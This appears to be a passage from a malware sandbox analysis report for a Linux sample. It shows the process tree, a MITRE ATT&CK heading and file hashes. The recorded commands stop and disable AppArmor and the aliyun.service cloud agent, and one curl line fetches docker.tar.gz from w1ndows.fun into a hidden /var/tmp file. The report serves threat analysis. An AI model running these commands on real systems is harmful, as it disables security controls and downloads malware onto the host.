/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵PID:1868
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
PID:1860 -
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
PID:1873 -
/lib/systemd/systemd-sysv-install/lib/systemd/systemd-sysv-install disable apparmor3⤵PID:1877
-
/usr/bin/getoptgetopt -o r: --long root: -- disable apparmor4⤵PID:1878
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor defaults4⤵PID:1879
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1880 -
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor disable4⤵
- Flushes firewall rules
PID:1881 -
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
PID:1885 -
/usr/sbin/serviceservice aliyun.service stop2⤵PID:1889
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:1893
-
/usr/bin/basenamebasename /usr/sbin/service3⤵PID:1894
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Disables AppArmor
PID:1895 -
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵PID:1898
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Disables AppArmor
PID:1897 -
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
PID:1889 -
/bin/systemctlsystemctl disable aliyun.service2⤵
- Disables AppArmor
PID:1905 -
/usr/bin/curlcurl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz2⤵PID:1909
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba